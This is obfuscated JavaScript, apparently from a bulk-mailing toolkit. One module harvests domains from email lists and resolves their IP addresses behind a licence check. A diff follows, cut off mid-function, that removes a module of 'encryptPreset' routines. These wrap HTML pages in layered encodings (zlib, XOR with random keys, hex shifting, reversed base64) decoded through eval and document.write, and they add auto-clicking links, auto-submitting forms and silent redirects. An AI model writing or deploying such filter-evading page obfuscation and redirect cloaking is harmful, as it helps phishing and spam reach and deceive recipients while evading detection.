fs=require('fs'),dns=require(a31_0x28ac19(0x20b))['promises'],path=require(a31_0x28ac19(0x1e2)),chalk=require(a31_0x28ac19(0x1e6)),{once}=require('events'),{CURRENT_DIR,alertUser,spinnerFunc,executionCompleted,getDomain}=require('../../functions/globals'),JwtVerify=require(a31_0x28ac19(0x208)),EXTRACTOR_CONCURRENCY=Math[a31_0x28ac19(0x1c0)](0x1,Math[a31_0x28ac19(0x1d9)](0x64,Number(process['env'][a31_0x28ac19(0x201)])||0x19)),DNS_TIMEOUT_MS=Math[a31_0x28ac19(0x1c0)](0x3e8,Math[a31_0x28ac19(0x1d9)](0xea60,Number(process[a31_0x28ac19(0x202)]['EXTRACTOR_DNS_TIMEOUT_MS'])||0x1f40)),DNS_RETRIES=Math[a31_0x28ac19(0x1c0)](0x0,Math['min'](0x5,Number(process[a31_0x28ac19(0x202)][a31_0x28ac19(0x1fb)])||0x1)),PROGRESS_EVERY=Math['max'](0x3e8,Number(process['env'][a31_0x28ac19(0x1ea)])||0xc350);function parseAddHttpOption(_0x2dbcaa){const _0xa23f5b=a31_0x28ac19;if(_0x2dbcaa===!![]||_0x2dbcaa===0x1)return!![];if(_0x2dbcaa===![]||_0x2dbcaa===0x0||_0x2dbcaa==null)return![];const _0x4d5d7b=String(_0x2dbcaa)['trim']()[_0xa23f5b(0x224)]();if(['1',_0xa23f5b(0x22f),_0xa23f5b(0x1d2),'y','on','enable','enabled'][_0xa23f5b(0x1ed)](_0x4d5d7b))return!![];if(['0',_0xa23f5b(0x210),'no','n',_0xa23f5b(0x205),_0xa23f5b(0x1f8),'disabled'][_0xa23f5b(0x1ed)](_0x4d5d7b))return![];return![];}function parseIpVersionOption(_0x5b5f00){const _0x7e6a70=a31_0x28ac19;if(_0x5b5f00==null||_0x5b5f00==='')return _0x7e6a70(0x238);const _0x3996b0=String(_0x5b5f00)[_0x7e6a70(0x1eb)]()[_0x7e6a70(0x224)]();if([_0x7e6a70(0x217),'4','v4','a'][_0x7e6a70(0x1ed)](_0x3996b0))return'ipv4';if(['ipv6','6','v6',_0x7e6a70(0x1dc)][_0x7e6a70(0x1ed)](_0x3996b0))return _0x7e6a70(0x1fa);return'both';}function resolveExtractOptions(_0x22382a={}){const _0x532ac1=a31_0x28ac19,_0x486de3=parseAddHttpOption(process['env'][_0x532ac1(0x1cb)]),_0xba16dc=_0x22382a[_0x532ac1(0x21d)]===undefined?_0x486de3:parseAddHttpOption(_0x22382a[_0x532ac1(0x21d)]),_0x132e33=parseIpVersionOption(process[_0x532ac1(0x202)][_0x532ac1(0x222)]),_0xb46cc1=_0x22382a[_0x532ac1(0x21f)]===undefined?_0x132e33:parseIpVersionOption(_0x22382a[_0x532ac1(0x21f)]);return{'addHttp':_0xba16dc,'ipVersion':_0xb46cc1};}function a31_0x5991(_0x3844ec,_0x11c2fd){_0x3844ec=_0x3844ec-0x1be;const _0xb620c8=a31_0xb2e9();let _0x31cde3=_0xb620c8[_0x3844ec];return _0x31cde3;}function applyHttpPrefix(_0x22affb,_0x58c5c6=![]){const _0x1b3add=a31_0x28ac19,_0x22f301=String(_0x22affb||'')[_0x1b3add(0x1eb)]();if(!_0x22f301||!_0x58c5c6)return _0x22f301;if(/^https?:\/\//i['test'](_0x22f301))return _0x22f301;return _0x1b3add(0x20e)+_0x22f301;}function formatExtractValue(_0x4acd30,_0x1078f0={}){const _0x107a87=a31_0x28ac19;return applyHttpPrefix(_0x4acd30,!!_0x1078f0[_0x107a87(0x21d)]);}function announceTitle(_0x3f81fe,_0x39ace7={}){const _0x5c56b0=a31_0x28ac19,_0xd46ac0=[];if(_0x3f81fe==='IPs'){if(_0x39ace7[_0x5c56b0(0x21f)]==='ipv4')_0xd46ac0['push'](_0x5c56b0(0x234));else{if(_0x39ace7['ipVersion']===_0x5c56b0(0x1fa))_0xd46ac0[_0x5c56b0(0x1df)](_0x5c56b0(0x1d8));else _0xd46ac0[_0x5c56b0(0x1df)](_0x5c56b0(0x22c));}}if(_0x39ace7['addHttp'])_0xd46ac0[_0x5c56b0(0x1df)](_0x5c56b0(0x1e7));const _0x3b0e8a=_0xd46ac0[_0x5c56b0(0x209)]?'\x20('+_0xd46ac0['join'](',\x20')+')':'';return console['log'](_0x5c56b0(0x22d)+chalk[_0x5c56b0(0x1c7)](''+_0x3f81fe+_0x3b0e8a)+'\x20]\x0a');}function extractIPs(_0x552014,_0x55c7de={}){const _0x1ac1fc=a31_0x28ac19;JwtVerify();const _0x206c30=resolveExtractOptions(_0x55c7de);return announceTitle(_0x1ac1fc(0x220),_0x206c30),runIpExtraction(_0x552014,_0x206c30)[_0x1ac1fc(0x216)](fatalExtractorError);}function extractDomains(_0x23e7c5,_0x51ae43={}){const _0x2a11d7=a31_0x28ac19;JwtVerify();const _0x7f5959=resolveExtractOptions(_0x51ae43);return announceTitle(_0x2a11d7(0x22a),_0x7f5959),runDomainExtraction(_0x23e7c5,_0x7f5959)[_0x2a11d7(0x216)](fatalExtractorError);}module[a31_0x28ac19(0x230)]={'extractIPs':extractIPs,'extractDomains':extractDomains,'applyHttpPrefix':applyHttpPrefix,'formatExtractValue':formatExtractValue,'resolveExtractOptions':resolveExtractOptions,'parseAddHttpOption':parseAddHttpOption,'parseIpVersionOption':parseIpVersionOption},require(a31_0x28ac19(0x208))[a31_0x28ac19(0x225)](a31_0x28ac19(0x1c3));function fatalExtractorError(_0x386f70){const _0x3794e1=a31_0x28ac19;console['error'](_0x386f70?.[_0x3794e1(0x1da)]||_0x386f70),process[_0x3794e1(0x1e0)](0x1);}async function*toAsyncIterable(_0x5ba850){const _0x5aad01=a31_0x28ac19;if(!_0x5ba850)return;if(typeof _0x5ba850[Symbol['asyncIterator']]===_0x5aad01(0x20f)){for await(const _0x544ef4 of _0x5ba850)yield _0x544ef4;return;}if(typeof _0x5ba850[Symbol[_0x5aad01(0x1cd)]]===_0x5aad01(0x20f)){for(const _0x324678 of _0x5ba850)yield _0x324678;}}function normalizeDomainFromEmail(_0x32e524){const _0x18cc69=a31_0x28ac19,_0x424949=String(_0x32e524||'')[_0x18cc69(0x1eb)]()[_0x18cc69(0x224)]();if(!_0x424949||!_0x424949[_0x18cc69(0x1ed)]('@'))return'';const _0x17a6eb=getDomain(_0x424949)[_0x18cc69(0x224)]()[_0x18cc69(0x214)](/\.$/,'');return isValidDomain(_0x17a6eb)?_0x17a6eb:'';}function isValidDomain(_0x43852e){const _0x4a6bfa=a31_0x28ac19,_0x48e4db=String(_0x43852e||'')[_0x4a6bfa(0x1eb)]()['toLowerCase']();if(!_0x48e4db||_0x48e4db['length']>0xfd||_0x48e4db[_0x4a6bfa(0x1ed)]('..'))return![];const _0x4e8de4=_0x48e4db[_0x4a6bfa(0x1f4)]('.');if(_0x4e8de4[_0x4a6bfa(0x209)]<0x2)return![];return _0x4e8de4[_0x4a6bfa(0x1cf)](_0x11d848=>{const _0x38354c=_0x4a6bfa;return _0x11d848['length']>0x0&&_0x11d848[_0x38354c(0x209)]<=0x3f&&/^[a-z0-9-]+$/i[_0x38354c(0x239)](_0x11d848)&&!_0x11d848[_0x38354c(0x211)]('-')&&!_0x11d848[_0x38354c(0x1f0)]('-');});}function createLineWriter(_0x51b032){const _0x1afd99=a31_0x28ac19,_0xfea07=fs['createWriteStream'](path['join'](CURRENT_DIR,_0x51b032),{'flags':'w','encoding':'utf8','highWaterMark':0x400*0x400});return _0xfea07[_0x1afd99(0x218)]=null,_0xfea07['on']('error',_0x1017bf=>{const _0x3ccb13=_0x1afd99;_0xfea07[_0x3ccb13(0x218)]=_0x1017bf;}),_0xfea07;}async function writeLine(_0x3935f9,_0x22f30d){const _0x2096b8=a31_0x28ac19;if(_0x3935f9[_0x2096b8(0x218)])throw _0x3935f9['extractorError'];!_0x3935f9[_0x2096b8(0x232)](_0x22f30d+'\x0a',_0x2096b8(0x1f1))&&await Promise['race']([once(_0x3935f9,_0x2096b8(0x1c9)),once(_0x3935f9,_0x2096b8(0x1f3))[_0x2096b8(0x1ec)](([_0x1efb0f])=>{throw _0x1efb0f;})]);if(_0x3935f9[_0x2096b8(0x218)])throw _0x3935f9['extractorError'];}async function closeWriter(_0xbfd4e7){const _0x5ee225=a31_0x28ac19;if(!_0xbfd4e7)return;if(_0xbfd4e7[_0x5ee225(0x218)])throw _0xbfd4e7[_0x5ee225(0x218)];await new Promise((_0x556535,_0x252400)=>{const _0x2aac23=_0x5ee225;_0xbfd4e7[_0x2aac23(0x223)](_0x2aac23(0x1f3),_0x252400),_0xbfd4e7[_0x2aac23(0x23b)](_0x556535);});if(_0xbfd4e7[_0x5ee225(0x218)])throw _0xbfd4e7[_0x5ee225(0x218)];}function updateProgress(_0x47acaf,_0x38aaba){const _0x1b3bfb=a31_0x28ac19;if(!_0x47acaf)return;if(typeof _0x47acaf[_0x1b3bfb(0x1fe)]===_0x1b3bfb(0x20f))_0x47acaf['update']({'text':_0x38aaba});else{if(_0x1b3bfb(0x200)in _0x47acaf)_0x47acaf['text']=_0x38aaba;}}function shouldReportProgress(_0x12ede5){const _0x5a4cfe=a31_0x28ac19;return _0x12ede5[_0x5a4cfe(0x207)]>0x0&&_0x12ede5[_0x5a4cfe(0x207)]%PROGRESS_EVERY===0x0;}function printSummary(_0x52e3b9,_0xfd20d,_0x16bc31=[],_0x424424={}){const _0x557c7f=a31_0x28ac19;executionCompleted(),console[_0x557c7f(0x236)](chalk[_0x557c7f(0x203)]('\x0a'+_0x52e3b9+_0x557c7f(0x1c1))),console[_0x557c7f(0x236)](_0x557c7f(0x1c4)+_0xfd20d[_0x557c7f(0x207)][_0x557c7f(0x1f9)]()),console['log'](_0x557c7f(0x1c8)+_0xfd20d[_0x557c7f(0x1c5)][_0x557c7f(0x1f9)]());if(_0x424424[_0x557c7f(0x21d)]){const _0xe68104=typeof _0xfd20d['records']==='number'?_0x557c7f(0x220):'domains';console[_0x557c7f(0x236)](_0x557c7f(0x20d)+_0xe68104);}typeof _0xfd20d['records']==='number'&&_0x424424[_0x557c7f(0x21f)]&&_0x424424[_0x557c7f(0x21f)]!==_0x557c7f(0x238)&&console[_0x557c7f(0x236)]('·\x20IP\x20version\x20\x20\x20\x20\x20:\x20'+_0x424424[_0x557c7f(0x21f)]['toUpperCase']()+_0x557c7f(0x23a));typeof _0xfd20d[_0x557c7f(0x229)]===_0x557c7f(0x1e9)&&(console[_0x557c7f(0x236)](_0x557c7f(0x23c)+_0xfd20d['records']['toLocaleString']()),console[_0x557c7f(0x236)](_0x557c7f(0x21a)+_0xfd20d[_0x557c7f(0x1f5)]['toLocaleString']()),console[_0x557c7f(0x236)](_0x557c7f(0x235)+_0xfd20d['errors'][_0x557c7f(0x1f9)]()));console[_0x557c7f(0x236)](_0x557c7f(0x20c)+_0xfd20d[_0x557c7f(0x21c)][_0x557c7f(0x1f9)]());for(const _0x17106d of _0x16bc31)console[_0x557c7f(0x236)]('·\x20Output\x20\x20\x20\x20\x20\x20\x20\x20\x20:\x20'+_0x17106d);console[_0x557c7f(0x236)](''),alertUser();}async function runDomainExtraction(_0x1453a2,_0x384a21={}){const _0x2a854c=a31_0x28ac19,_0x10e5ac=spinnerFunc({'text':_0x2a854c(0x1f6)}),_0x3796b4=createLineWriter('domains.emails.txt'),_0x3d6243=new Set(),_0xdf3bc5={'scanned':0x0,'uniqueDomains':0x0,'duplicates':0x0};try{for await(const _0x4752ea of toAsyncIterable(_0x1453a2)){_0xdf3bc5[_0x2a854c(0x207)]++;const _0x213e60=normalizeDomainFromEmail(_0x4752ea);if(!_0x213e60)continue;if(_0x3d6243['has'](_0x213e60)){_0xdf3bc5[_0x2a854c(0x21c)]++;continue;}_0x3d6243[_0x2a854c(0x1c6)](_0x213e60),_0xdf3bc5[_0x2a854c(0x1c5)]++,await writeLine(_0x3796b4,formatExtractValue(_0x213e60,_0x384a21)),shouldReportProgress(_0xdf3bc5)&&updateProgress(_0x10e5ac,_0x2a854c(0x1f7)+_0xdf3bc5[_0x2a854c(0x207)][_0x2a854c(0x1f9)]()+'\x20emails,\x20wrote\x20'+_0xdf3bc5[_0x2a854c(0x1c5)][_0x2a854c(0x1f9)]()+_0x2a854c(0x212));}}finally{await closeWriter(_0x3796b4);if(_0x10e5ac&&typeof _0x10e5ac[_0x2a854c(0x1e1)]===_0x2a854c(0x20f))_0x10e5ac[_0x2a854c(0x1e1)]();}printSummary(_0x2a854c(0x1cc),_0xdf3bc5,[_0x2a854c(0x213)],_0x384a21);}function timeoutError(_0x44a4a7,_0x1d721f){const _0xff1847=a31_0x28ac19,_0x477190=new Error(_0x1d721f+_0xff1847(0x1fd)+_0x44a4a7);return _0x477190[_0xff1847(0x1be)]='ETIMEOUT',_0x477190;}async function withTimeout(_0x32b8f6,_0x2664cb,_0x2d3797,_0x3a147b){const _0x4284b0=a31_0x28ac19;let _0xee27cb=null;try{return await Promise[_0x4284b0(0x231)]([_0x32b8f6,new Promise((_0x4d1289,_0x6cd0c1)=>{_0xee27cb=setTimeout(()=>_0x6cd0c1(timeoutError(_0x2d3797,_0x3a147b)),_0x2664cb);})]);}finally{if(_0xee27cb)clearTimeout(_0xee27cb);}}async function resolveRecord(_0x199194,_0xd5b99f){const _0xfcde4d=a31_0x28ac19,_0x3cded8=_0xd5b99f==='AAAA'?dns['resolve6'](_0x199194):dns[_0xfcde4d(0x206)](_0x199194);return withTimeout(_0x3cded8,DNS_TIMEOUT_MS,_0x199194,_0xd5b99f);}function isRetryableDnsError(_0x21a3c7){const _0x2a4580=a31_0x28ac19;return[_0x2a4580(0x22b),_0x2a4580(0x1d4),_0x2a4580(0x204),'ECONNRESET'][_0x2a4580(0x1ed)](_0x21a3c7?.[_0x2a4580(0x1be)]);}async function resolveDomainIps(_0x1d7901,_0x4b7a45=a31_0x28ac19(0x238)){const _0x4a24b1=a31_0x28ac19,_0x9112f0=[];if(_0x4b7a45===_0x4a24b1(0x238)||_0x4b7a45===_0x4a24b1(0x217))_0x9112f0[_0x4a24b1(0x1df)]('A');if(_0x4b7a45===_0x4a24b1(0x238)||_0x4b7a45==='ipv6')_0x9112f0['push'](_0x4a24b1(0x1e3));let _0x3927c5=[];for(let _0x5d1ef5=0x0;_0x5d1ef5<=DNS_RETRIES;_0x5d1ef5++){const _0x43a3b0=await Promise[_0x4a24b1(0x1de)](_0x9112f0[_0x4a24b1(0x1d6)](_0x46f18f=>resolveRecord(_0x1d7901,_0x46f18f))),_0x8d54c1=[];_0x3927c5=[];for(const _0x1997fb of _0x43a3b0){if(_0x1997fb[_0x4a24b1(0x1e5)]===_0x4a24b1(0x215))_0x8d54c1[_0x4a24b1(0x1df)](..._0x1997fb[_0x4a24b1(0x1dd)]);else _0x3927c5[_0x4a24b1(0x1df)](_0x1997fb[_0x4a24b1(0x233)]);}if(_0x8d54c1['length'])return{'ips':Array[_0x4a24b1(0x1d7)](new Set(_0x8d54c1)),'error':null};if(!_0x3927c5[_0x4a24b1(0x226)](isRetryableDnsError))break;}const _0x4286cb=_0x3927c5['map'](_0x298f82=>_0x298f82?.[_0x4a24b1(0x1be)]||_0x298f82?.['message']||_0x4a24b1(0x21e))['join'](',\x20');return{'ips':[],'error':_0x4286cb||_0x4a24b1(0x21e)};}async function runIpExtraction(_0x1c9945,_0x2e596a={}){const _0x2ced16=a31_0x28ac19,_0x338f18=spinnerFunc({'text':_0x2ced16(0x228)}),_0x5c6c0c=createLineWriter('ips.emails.txt'),_0x57709d=createLineWriter(_0x2ced16(0x1bf)),_0x592d2d=createLineWriter(_0x2ced16(0x237)),_0x51b564=new Set(),_0x2791b8=new Set(),_0x10818a=new Set(),_0x5ea52a={'scanned':0x0,'uniqueDomains':0x0,'duplicates':0x0,'records':0x0,'misses':0x0,'errors':0x0};async function _0x1f44aa(_0x5cd060){const _0x3e47c8=_0x2ced16,{ips:_0x5762ba,error:_0x1c3217}=await resolveDomainIps(_0x5cd060,_0x2e596a[_0x3e47c8(0x21f)]),_0x3101fb=formatExtractValue(_0x5cd060,_0x2e596a);if(!_0x5762ba[_0x3e47c8(0x209)]){_0x1c3217?(_0x5ea52a['errors']++,await writeLine(_0x592d2d,_0x3101fb+'|'+_0x1c3217)):_0x5ea52a[_0x3e47c8(0x1f5)]++;return;}for(const _0x5d4458 of _0x5762ba){const _0x13b8d0=formatExtractValue(_0x5d4458,_0x2e596a);await writeLine(_0x57709d,_0x3101fb+'|'+_0x13b8d0);if(_0x2791b8[_0x3e47c8(0x1ca)](_0x5d4458))continue;_0x2791b8[_0x3e47c8(0x1c6)](_0x5d4458),_0x5ea52a[_0x3e47c8(0x229)]++,await writeLine(_0x5c6c0c,_0x13b8d0);}}try{for await(const _0x2e84d8 of toAsyncIterable(_0x1c9945)){_0x5ea52a[_0x2ced16(0x207)]++;const _0x273a54=normalizeDomainFromEmail(_0x2e84d8);if(!_0x273a54)continue;if(_0x51b564[_0x2ced16(0x1ca)](_0x273a54)){_0x5ea52a['duplicates']++;continue;}_0x51b564[_0x2ced16(0x1c6)](_0x273a54),_0x5ea52a[_0x2ced16(0x1c5)]++;const _0x3ba2bf=_0x1f44aa(_0x273a54)[_0x2ced16(0x21b)](()=>_0x10818a[_0x2ced16(0x20a)](_0x3ba2bf));_0x10818a[_0x2ced16(0x1c6)](_0x3ba2bf);if(_0x10818a[_0x2ced16(0x1d0)]>=EXTRACTOR_CONCURRENCY)await Promise[_0x2ced16(0x231)](_0x10818a);shouldReportProgress(_0x5ea52a)&&updateProgress(_0x338f18,_0x2ced16(0x1f7)+_0x5ea52a[_0x2ced16(0x207)][_0x2ced16(0x1f9)]()+'\x20emails,\x20queued\x20'+_0x5ea52a['uniqueDomains'][_0x2ced16(0x1f9)]()+'\x20domains');}await Promise['all'](_0x10818a);}finally{await Promise[_0x2ced16(0x22e)]([closeWriter(_0x5c6c0c),closeWriter(_0x57709d),closeWriter(_0x592d2d)]);if(_0x338f18&&typeof _0x338f18[_0x2ced16(0x1e1)]===_0x2ced16(0x20f))_0x338f18[_0x2ced16(0x1e1)]();}printSummary(_0x2ced16(0x1e8),_0x5ea52a,[_0x2ced16(0x1d1),_0x2ced16(0x1bf),_0x2ced16(0x237)],_0x2e596a);}
@@ -1 +1 @@
1
- const a32_0xbcb7c4=a32_0x886d;(function(_0x1ea50e,_0x2b0a73){const _0x3fc1a7=a32_0x886d,_0x24c757=_0x1ea50e();while(!![]){try{const _0x32f000=parseInt(_0x3fc1a7(0x152))/0x1*(-parseInt(_0x3fc1a7(0x16f))/0x2)+-parseInt(_0x3fc1a7(0x16e))/0x3+parseInt(_0x3fc1a7(0x116))/0x4*(-parseInt(_0x3fc1a7(0x156))/0x5)+-parseInt(_0x3fc1a7(0x13c))/0x6+parseInt(_0x3fc1a7(0x12c))/0x7+parseInt(_0x3fc1a7(0x164))/0x8*(-parseInt(_0x3fc1a7(0x115))/0x9)+parseInt(_0x3fc1a7(0x16d))/0xa;if(_0x32f000===_0x2b0a73)break;else _0x24c757['push'](_0x24c757['shift']());}catch(_0x46874d){_0x24c757['push'](_0x24c757['shift']());}}}(a32_0x196a,0xaf23b));const a32_0x41c173=(function(){let _0x1399a1=!![];return function(_0x411489,_0x115d40){const _0x1a8660=_0x1399a1?function(){const _0x37ee3f=a32_0x886d;if(_0x115d40){const _0x348620=_0x115d40[_0x37ee3f(0x12e)](_0x411489,arguments);return _0x115d40=null,_0x348620;}}:function(){};return _0x1399a1=![],_0x1a8660;};}()),a32_0x360dae=a32_0x41c173(this,function(){const _0x5b76b5=a32_0x886d;return a32_0x360dae[_0x5b76b5(0x100)]()['search'](_0x5b76b5(0x117))['toString']()[_0x5b76b5(0x13a)](a32_0x360dae)[_0x5b76b5(0x15d)]('(((.+)+)+)+$');});a32_0x360dae();const crypto=require(a32_0xbcb7c4(0x159)),zlib=require(a32_0xbcb7c4(0x113));function htmlDecodeShell(_0x257f1b){const _0x5b0cca=a32_0xbcb7c4;return _0x5b0cca(0x12a)+('<script>(function(){document.open();'+_0x257f1b+'document.close();})();</script>')+_0x5b0cca(0x10d);}function safeHref(_0x12d8fb){const _0x204f78=a32_0xbcb7c4,_0x78a200=String(_0x12d8fb||'')['trim']();return/^https?:\/\//i[_0x204f78(0x161)](_0x78a200)?_0x78a200[_0x204f78(0x118)](/"/g,_0x204f78(0x160)):'#';}function insertBeforeBodyEnd(_0x5dd50e,_0x4d9f80){const _0x402a30=a32_0xbcb7c4,_0x159633=String(_0x5dd50e);return _0x159633[_0x402a30(0xfb)](_0x402a30(0x11a))?_0x159633[_0x402a30(0x118)](_0x402a30(0x11a),_0x4d9f80+_0x402a30(0x171)):_0x402a30(0x132)+_0x159633+_0x4d9f80+'</body></html>';}function insertBeforeHeadEnd(_0x48516f,_0x718e66){const _0x5f0124=a32_0xbcb7c4,_0x5e0e86=String(_0x48516f);return _0x5e0e86['includes'](_0x5f0124(0x166))?_0x5e0e86[_0x5f0124(0x118)](_0x5f0124(0x166),_0x718e66+'\x0a</head>'):_0x5f0124(0x144)+_0x718e66+_0x5f0124(0x146)+_0x5e0e86+_0x5f0124(0x10d);}function rewriteInlineScripts(_0x142f00,_0x2df9c4){const _0x519886=a32_0xbcb7c4,_0x254c39=/<script\b([^>]*)>([\s\S]*?)<\/script>/gi;let _0x55cdf5=String(_0x142f00),_0x5b0653;const _0x1bf5fc=[];while((_0x5b0653=_0x254c39[_0x519886(0x142)](_0x55cdf5))!==null){const _0x4798dd=_0x5b0653[0x2];if(!_0x4798dd[_0x519886(0x106)]())continue;_0x1bf5fc[_0x519886(0x172)]({'from':_0x5b0653[0x0],'to':_0x519886(0x16a)+_0x5b0653[0x1]+'>'+_0x2df9c4(_0x4798dd)+_0x519886(0xfe)});}for(const _0x1babfb of _0x1bf5fc)_0x55cdf5=_0x55cdf5['split'](_0x1babfb[_0x519886(0x157)])['join'](_0x1babfb['to']);return _0x1bf5fc[_0x519886(0x167)]?_0x55cdf5:_0x142f00;}function encryptPreset11(_0x273ae5){const _0x3fa0ba=a32_0xbcb7c4,_0x5568ce=zlib[_0x3fa0ba(0x123)](Buffer['from'](String(_0x273ae5),'utf8')),_0x3d575e=_0x5568ce['toString'](_0x3fa0ba(0x143));return _0x3fa0ba(0x12a)+(_0x3fa0ba(0x130)+_0x3d575e+'\x27;')+'var s=document.createElement(\'script\');'+_0x3fa0ba(0x108)+_0x3fa0ba(0x111)+_0x3fa0ba(0x102)+'document.open();document.write(pako.inflate(a,{to:\'string\'}));document.close();};'+'document.head.appendChild(s);})();</script>'+_0x3fa0ba(0x10d);}function encryptPreset12(_0x377601){const _0x335e8e=a32_0xbcb7c4,_0x5d4f53=Buffer[_0x335e8e(0x157)](String(_0x377601),_0x335e8e(0x14c))['toString'](_0x335e8e(0x14b)),_0x15daf7=_0x5d4f53[_0x335e8e(0x149)]('')[_0x335e8e(0x107)](_0x4f80b1=>{if(_0x4f80b1>='0'&&_0x4f80b1<='9')return String((Number(_0x4f80b1)+0x3)%0xa);if(_0x4f80b1>='a'&&_0x4f80b1<='f')return String['fromCharCode']((_0x4f80b1['charCodeAt'](0x0)-0x61+0x3)%0x6+0x61);return _0x4f80b1;})['join']('');return htmlDecodeShell(_0x335e8e(0x14f)+_0x15daf7+_0x335e8e(0x15a)+_0x335e8e(0x145)+_0x335e8e(0x10c)+_0x335e8e(0x114)+_0x335e8e(0x16b)+'document.write(o);');}function a32_0x196a(){const _0xfe435d=['5337570WZgmyA','ABCDEFGHIJKLMNOPQRSTUVWXYZ234567','<input\x20type=\x22submit\x22\x20value=\x22go\x22></form>','<script>(function(){var\x20p=(location.protocol||\x27https:\x27)+\x27//\x27;','(0,eval)(b.join(\x27\x27));})();','];(0,eval)(a.join(\x27\x27));})();','exec','base64','<!doctype\x20html><html><head>','for(var\x20i=0;i<h.length;i+=2){var\x20a=h[i],b=h[i+1];','</head><body>','for(var\x20i=0;i<s.length;i++)bits+=a.indexOf(s[i]).toString(2).padStart(5,\x270\x27);','/*mtmc*/','split','padStart','hex','utf8','(function(){var\x20a=[','for(var\x20i=0;i<d.length;i++)o+=String.fromCharCode(d.charCodeAt(i)^k.charCodeAt(i%k.length));','var\x20h=\x27','stringify','<script>(function(){var\x20a=document.getElementById(\x27mtmc-obf16\x27);if(a){try{a.click();}catch(e){window.location.href=a.href;}}})();</script>','664SOLykz','(async\x20function(){try{\x0a','\x27),o=\x27\x27;','`);','5318300FXEmVX','from','(0,eval)(s);})();','crypto','\x27,o=\x27\x27;','var\x20d=atob(\x27','eval(String.raw`','search','\x22);','if(typeof\x20pako!==\x27undefined\x27){(0,eval)(pako.inflate(a,{to:\x27string\x27}));}','%22','test','\x27,b=atob(p),a=new\x20Uint8Array(b.length);','<form\x20id=\x22mtmc-obf14\x22\x20method=\x22get\x22\x20action=\x22','755760Yolome','slice','</head>','length','\x27);','setTimeout(function(){window.location.href=\x27','<script','o+=String.fromCharCode(parseInt(a+b,16));}','alloc','56850770awPnDk','4173441WCIjuT','1492QzeISH','(function(){var\x20b=atob(\x27','\x0a</body>','push','<a\x20id=\x22mtmc-obf16\x22\x20href=\x22','for(var\x20i=0;i+1<b.length;i+=2){var\x20t=b[i];b[i]=b[i+1];b[i+1]=t;}','\x27,bits=\x27\x27;','random','assign','includes','<script>(function(){var\x20h=atob(\x27','\x27,b=s.replace(/-/g,\x27+\x27).replace(/_/g,\x27/\x27);','</script>','var\x20out=\x27\x27;for(var\x20j=0;j+8<=bits.length;j+=8)out+=String.fromCharCode(parseInt(bits.slice(j,j+8),2));','toString','for(var\x20i=0;i<d.length;i++)o+=String.fromCharCode((~d.charCodeAt(i))&255);','for(var\x20i=0;i<b.length;i++)a[i]=b.charCodeAt(i);','\x27).split(\x27\x27);','(function(){var\x20k=\x27',';return\x20(0,eval)(p.join(\x27\x27));})();','trim','map','s.src=\x27https://cdnjs.cloudflare.com/ajax/libs/pako/2.0.4/pako.min.js\x27;','(function(){var\x20c=[','for(var\x20i=0;i<d.length;i++)o+=String.fromCharCode(d.charCodeAt(i)^k.charCodeAt(i%k.length)^((i*31)&255));','floor','if(a>=\x270\x27&&a<=\x279\x27)a=String((+a+7)%10);','</body></html>','exports','<script>(function(){var\x20u=atob(\x27','var\x20r=\x27','s.onload=function(){var\x20b=atob(p),a=new\x20Uint8Array(b.length);','for(var\x20i=0;i<d.length;i++)bytes.push(d.charCodeAt(i));','zlib','if(b>=\x27a\x27&&b<=\x27f\x27)b=String.fromCharCode(((b.charCodeAt(0)-97+3)%6)+97);','126yFEdGL','4ighIeI','(((.+)+)+)+$','replace','if(location.hash){location.href=h;}else{location.assign(h);}})();</script>','</body>','\x27);(0,eval)(s);})();','<script>(function(){var\x20c=[','],u=\x27\x27;','(0,eval)(o);})();','var\x20o=','\x27,b=r.split(\x27\x27).reverse().join(\x27\x27);document.write(atob(b));','for(var\x20i=0;i<c.length;i++)u+=String.fromCharCode(c[i]);','\x22\x20rel=\x22noopener\x20noreferrer\x22>Continue</a>','deflateSync','\x22\x20ping=\x22','(function(){var\x20p=\x27','window.location.href=p+\x27','randomBytes','(function(){var\x20p=','else{(0,eval)(b);}})();','<!doctype\x20html><html><head><meta\x20charset=\x22utf-8\x22></head><body>','var\x20s=\x27','1362340dpdUue','\x27;},50);})();</script>','apply','join','<script>(function(){var\x20p=\x27','charCodeAt','<!doctype\x20html><html><body>','var\x20ks=',';document.write(o.map(function(i){return\x20p[i];}).join(\x27\x27));','\x27,d=atob(\x27','\x27),bytes=[];','var\x20k=\x27','for(var\x20k=ks.length-1;k>=0;k--){var\x20key=ks[k];for(var\x20j=0;j<bytes.length;j++)bytes[j]^=key.charCodeAt(j%key.length);}','i.style.display=\x27none\x27;i.src=\x27','constructor','<script>(function(){var\x20f=document.getElementById(\x27mtmc-obf14\x27);if(f)f.submit();})();</script>'];a32_0x196a=function(){return _0xfe435d;};return a32_0x196a();}function encryptPreset13(_0x2391e4){const _0x18dbee=a32_0xbcb7c4,_0x32616a=Buffer[_0x18dbee(0x157)](String(_0x2391e4),'utf8')[_0x18dbee(0x100)](_0x18dbee(0x143)),_0x561485=_0x32616a[_0x18dbee(0x149)]('')['reverse']()[_0x18dbee(0x12f)]('');return htmlDecodeShell(_0x18dbee(0x110)+_0x561485+_0x18dbee(0x120));}function encryptPreset14(_0x1b4932){const _0x1dad70=a32_0xbcb7c4,_0xea5f35=Buffer['from'](String(_0x1b4932),_0x1dad70(0x14c)),_0x1792d8=Buffer[_0x1dad70(0x157)](_0xea5f35['map'](_0x278045=>~_0x278045&0xff)),_0x5698fb=_0x1792d8['toString'](_0x1dad70(0x143));return htmlDecodeShell(_0x1dad70(0x15b)+_0x5698fb+_0x1dad70(0x154)+_0x1dad70(0x101)+'document.write(o);');}function encryptPreset15(_0x36f0f1){const _0x1d3bb2=a32_0xbcb7c4,_0x35aef8=crypto[_0x1d3bb2(0x127)](0x10)['toString'](_0x1d3bb2(0x14b)),_0x15e85d=Buffer[_0x1d3bb2(0x157)](String(_0x36f0f1),'utf8'),_0x4951d6=Buffer['alloc'](_0x15e85d[_0x1d3bb2(0x167)]);for(let _0x1bbe12=0x0;_0x1bbe12<_0x15e85d[_0x1d3bb2(0x167)];_0x1bbe12++){_0x4951d6[_0x1bbe12]=_0x15e85d[_0x1bbe12]^_0x35aef8[_0x1d3bb2(0x131)](_0x1bbe12%_0x35aef8[_0x1d3bb2(0x167)])^_0x1bbe12*0x1f&0xff;}const _0x6cc67=_0x4951d6[_0x1d3bb2(0x100)](_0x1d3bb2(0x143));return htmlDecodeShell(_0x1d3bb2(0x137)+_0x35aef8+_0x1d3bb2(0x135)+_0x6cc67+_0x1d3bb2(0x154)+_0x1d3bb2(0x10a)+'document.write(o);');}function encryptPreset16(_0x5ecaa9){const 